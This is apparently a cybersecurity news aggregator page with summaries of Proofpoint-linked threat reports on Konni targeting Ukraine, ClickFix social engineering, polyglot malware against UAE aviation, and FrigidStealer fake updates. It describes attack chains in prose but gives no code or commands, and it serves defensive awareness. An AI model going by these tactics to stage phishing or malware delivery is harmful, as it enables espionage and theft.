CyberSecurity news

FlagThis - #proofpoint

@securityonline.info //

North Korean APT Konni Targets Ukrainian Government - North Korean APT Konni targets Ukrainian government entities using phishing campaigns to gather intelligence on the Russia-Ukraine conflict.
North Korean state-sponsored threat group Konni, also known as Opal Sleet or TA406, has been observed actively targeting Ukrainian government entities in cyber espionage campaigns. These operations focus on gathering strategic intelligence related to the ongoing conflict between Russia and Ukraine. The group utilizes phishing campaigns to collect information on the trajectory of the Russian invasion, indicating North Korea's sustained interest in the geopolitical dynamics and its willingness to leverage cyber capabilities for strategic advantage.

TA406's cyber espionage activities involve sophisticated social engineering tactics, often impersonating fictitious think tanks, such as the "Royal Institute of Strategic Studies." These phishing emails are laced with lure content relevant to current Ukrainian political events, particularly those surrounding former military leader Valeriy Zaluzhnyi. The attackers use password-protected RAR files hosted on MEGA, containing .CHM files with embedded PowerShell scripts, or HTML files and LNK shortcuts to initiate the infection.

Once a target is compromised, PowerShell scripts are executed to gather extensive system information, including network configurations, system details, and WMI queries. This collected data is then Base64-encoded and transmitted to external servers, enabling the attackers to gain a comprehensive understanding of the targeted systems. The group employs various persistence mechanisms, such as installing batch files as autorun files and utilizing scheduled tasks to ensure continued access to compromised machines.

Recommended read:
References :
  • thehackernews.com: North Korean Konni APT Targets Ukraine with Malware to track Russian Invasion Progress
  • BleepingComputer: North Korea ramps up cyberspying in Ukraine to assess war risk
  • BleepingComputer: The state-backed North Korean threat group Konni (Opal Sleet, TA406) was observed targeting Ukrainian government entities in intelligence collection operations.
  • securityonline.info: In a recently disclosed campaign, TA406, a North Korean state-aligned threat actor, has expanded its cyber-espionage efforts by The post appeared first on SecurityOnline.
  • securityonline.info: TA406 Cyber Campaign: North Korea’s Focus on Ukraine Intelligence
@techradar.com //

State Actors Employ ClickFix Social Engineering Attacks - State-sponsored hacking groups from North Korea, Iran, and Russia are leveraging ClickFix social engineering tactics to deploy malware, tricking users into executing malicious commands disguised as legitimate solutions.
State-sponsored hacking groups from North Korea, Iran, and Russia have been found leveraging the increasingly popular ClickFix social engineering tactic to deploy malware. This technique, which tricks users into clicking malicious links or executing malicious commands, has been adopted by advanced persistent threat (APT) groups, demonstrating the evolving nature of cyber threats and the increasing fluidity of tactics in the threat landscape. Researchers have observed these groups incorporating ClickFix into their espionage operations between late 2024 and early 2025.

Proofpoint researchers documented this shift, noting that the incorporation of ClickFix is replacing the installation and execution stages in existing infection chains. The technique involves using dialogue boxes with instructions to trick victims into copying, pasting, and running malicious commands on their machines. These commands, often disguised as solutions to fake error messages or security alerts, ultimately lead to the execution of harmful scripts. This dual-pronged approach makes ClickFix particularly insidious, as it leverages human interaction to bypass traditional security measures like antivirus software and firewalls.

Specific examples of ClickFix campaigns include North Korea's TA427 targeting think tanks with spoofed emails and malicious PowerShell commands, and Iran's TA450 targeting organizations in the Middle East with fake Microsoft security updates. Russian-linked groups, such as UNK_RemoteRogue and TA422, have also experimented with ClickFix, distributing infected Word documents or using Google spreadsheet mimics to execute PowerShell commands. Experts warn that while some groups experimented with the technique in limited campaigns before returning to standard tactics, this attack method is expected to become more widely tested or adopted by threat actors.

Recommended read:
References :
  • gbhackers.com: State Sponsored Hackers now Widely Using ClickFix Attack Technique in Espionage Campaigns
  • The Hacker News: Multiple state-sponsored hacking groups from Iran, North Korea, and Russia have been found leveraging the increasingly popular ClickFix social engineering tactic to deploy malware
  • www.scworld.com: Attacks leveraging the ClickFix social engineering technique have been increasingly conducted by state-backed threat operations to facilitate malware infections over the past few months, reports The Hacker News.
  • www.bleepingcomputer.com: State-sponsored hackers embrace ClickFix social engineering tactic
  • cyberpress.org: State-Sponsored Hackers Widely Deploy ClickFix Attack in Espionage Campaigns
  • cybersecuritynews.com: State Sponsored Hackers Now Widely Using ClickFix Attack Technique in Espionage Campaigns
  • Cyber Security News: State Sponsored Hackers Now Widely Using ClickFix Attack Technique in Espionage Campaigns
  • gbhackers.com: State Sponsored Hackers now Widely Using ClickFix Attack Technique in Espionage Campaigns
  • Cyber Security News: State Sponsored Hackers Widely Deploy ClickFix Attack in Espionage Campaigns
  • www.techradar.com: State-sponsored actors spotted using ClickFix hacking tool developed by criminals
  • BleepingComputer: ClickFix attacks are being increasingly adopted by threat actors of all levels, with researchers now seeing multiple advanced persistent threat (APT) groups from North Korea, Iran, and Russia utilizing the tactic to breach networks.
  • securityonline.info: State-Sponsored Actors Adopt ClickFix Technique in Cyber Espionage
  • hackread.com: State-Backed Hackers from North Korea, Iran and Russia Use ClickFix in New Espionage Campaigns
  • hackread.com: North Korea, Iran, Russia-Backed Hackers Deploy ClickFix in New Attacks
  • www.bleepingcomputer.com: State-sponsored hackers embrace ClickFix social engineering tactic
  • sra.io: Beware of ClickFix: A Growing Social Engineering Threat
  • The DefendOps Diaries: The Rise of ClickFix: A New Social Engineering Threat
  • Anonymous ???????? :af:: ClickFix attacks are gaining traction among threat actors, with multiple advanced persistent threat (APT) groups from North Korea, Iran, and Russia adopting the technique in recent espionage campaigns.
  • Know Your Adversary: 112. State-Sponsored Threat Actors Adopted ClickFix Technique
  • www.itpro.com: State-sponsored cyber groups are flocking to the ‘ClickFix’ social engineering technique for the first time – and to great success.
  • Proofpoint Threat Insight: Proofpoint researchers discovered state-sponsored actors from North Korea, Iran and Russia experimenting in multiple campaigns with the ClickFix social engineering technique as a stage in their infection chains.
  • www.it-daily.net: ClickFix: From cyber trick to spy weapon
Ridhika Singh@cysecurity.news //

UAE Aviation and Satellite Targeting - UNK_CraftyCamel, a highly targeted cyber-espionage campaign, is underway, primarily targeting UAE aviation, satellite, and transportation firms, employing polyglot malware and compromised business accounts.
A sophisticated cyber espionage campaign, dubbed UNK_CraftyCamel, is actively targeting aviation and satellite organizations in the United Arab Emirates (UAE). Cybersecurity researchers at Proofpoint discovered this attack in October 2024. The attackers are employing advanced techniques, including the use of polyglot files, a custom Go-based backdoor known as Sosano, and compromised business accounts, to evade detection. This highly targeted campaign leverages compromised business relationships and tailored lures to deliver a multi-stage infection chain.

The attack begins with phishing emails sent from the compromised account of an Indian electronics company, INDIC Electronics. These emails contain links to malicious ZIP files hosted on domains designed to mimic legitimate companies. The ZIP archives contain cleverly disguised malware components using polyglot files, a relatively rare technique in espionage operations. These files are structured so they can be interpreted as multiple file formats, allowing attackers to hide malicious content within seemingly legitimate files, making detection more difficult. The use of polyglot files demonstrates an advanced adversary with a focus on stealth and obfuscation.

Once executed, the polyglot malware installs Sosano, a custom Go-based backdoor designed for stealth and resilience. Sosano establishes a connection with a command-and-control server and waits for commands, which include listing directories, executing shell commands, and downloading additional payloads. While some tactics overlap with known Iranian-aligned threat actors, researchers have not definitively linked this activity to any previously identified group. The attackers’ focus on aviation and satellite communications in the UAE suggests a strategic intelligence-gathering motive.

Recommended read:
References :
  • Cyber Security News: Hackers Exploit Business Relationships to Attack Arab Emirates Aviation Sector
  • gbhackers.com: Hackers Exploiting Business Relationships to Attack Arab Emirates Aviation Sector
  • The Record: Proofpoint researchers say they spotted new backdoor malware that suspected Iranian regime-backed hackers have aimed at sectors such as aviation, satellite communications and critical transportation infrastructure in the United Arab Emirates.
  • Information Security Buzz: Highly Targeted Cyber Espionage Campaign Targeting UAE Aviation Sector
  • thehackernews.com: Suspected Iranian Hackers Used Compromised Indian Firm's Email to Target U.A.E. Aviation Sector
  • Virus Bulletin: Proofpoint researchers identified a highly targeted email-based campaign targeting UAE organizations. The malicious messages were sent from a compromised entity in a trusted business relationship with the targets, and used lures customized to every target.
  • www.cysecurity.news: A highly targeted cyber espionage campaign, dubbed UNK_CraftyCamel, is targeting aviation and satellite organizations in the UAE. Attackers use polyglot files, a custom Go-based backdoor (Sosano), and compromised business accounts to evade detection.
  • Vulnerable U: Highly Targeted Polyglot Malware Campaign Hits UAE Aviation and Satellite Firms
  • Industrial Cyber: Proofpoint details likely Iranian-backed Sosano malware targeting UAE’s critical sectors
  • : New Cyber-Espionage Campaign Targets UAE Aviation and Transport
  • www.scworld.com: New Sosano malware attacks target UAE
  • securityonline.info: UNK_CraftyCamel: New Threat Group Using Polyglot Malware in UAE
  • securityaffairs.com: A new cyber espionage campaign is targeting UAE aviation and satellite companies. Researchers have identified a custom Go-based backdoor, Sosano, being used in this operation.
  • www.redpacketsecurity.com: Researchers have identified a new cyber-espionage campaign targeting aviation and satellite organizations in the UAE.
SC Staff@scmagazine.com //

FakeUpdate Campaigns Push FrigidStealer Mac Infostealer - FakeUpdate malware campaigns now involve TA2726 and TA2727 groups pushing FrigidStealer, a new macOS infostealer, via web inject campaigns.
The FakeUpdate malware campaigns are becoming increasingly complex with the emergence of new cybercrime groups, TA2726 and TA2727, now involved in pushing a new macOS infostealer called FrigidStealer. This malware is being distributed through web inject campaigns, where users are tricked into downloading fake browser updates. Proofpoint researchers have identified FrigidStealer as a new threat targeting Mac users.

This campaign also uses Windows and Android payloads, suggesting a broad targeting strategy. The malicious JavaScript used to display the fake browser update messages is being adopted by an increasing number of threat actors, making tracking and analysis more challenging. Proofpoint identified two new cybercriminal threat actors, TA2726 and TA2727, operating components of web inject campaigns.

Recommended read:
References :
  • cyberinsider.com: New macOS Malware FrigidStealer Spreads via Fake Updates
  • www.scworld.com: Novel FrigidStealer macOS malware spread via bogus browser updates
  • Virus Bulletin: Proofpoint researchers identified FrigidStealer, a new MacOS malware delivered via web inject campaigns. They also found two new threat actors, TA2726 and TA2727, operating components of web inject campaigns.
  • www.bleepingcomputer.com: FakeUpdate malware campaigns are increasingly becoming muddled, with two additional cybercrime groups tracked as TA2726 and TA2727, running campaigns that push a new macOS infostealer malware called FrigidStealer.
  • Proofpoint Threat Insight: Proofpoint researchers identified FrigidStealer, a new MacOS malware delivered via web inject campaigns. They also found two new threat actors, TA2726 and TA2727, operating components of web inject campaigns.
  • bsky.app: The FakeUpdate malware campaigns are increasingly becoming muddled, with two additional cybercrime groups tracked as TA2726 and TA2727, running campaigns that push a new macOS infostealer malware called FrigidStealer.
  • BleepingComputer: The FakeUpdate malware campaigns are increasingly becoming muddled, with two additional cybercrime groups tracked as TA2726 and TA2727, running campaigns that push a new macOS infostealer malware called FrigidStealer.
  • Anonymous ???????? :af:: FakeUpdate malware campaigns are increasingly becoming muddled, with two additional cybercrime groups tracked as TA2726 and TA2727, running campaigns that push a new macOS infostealer malware called FrigidStealer.

Posts

Blogs

Research Tools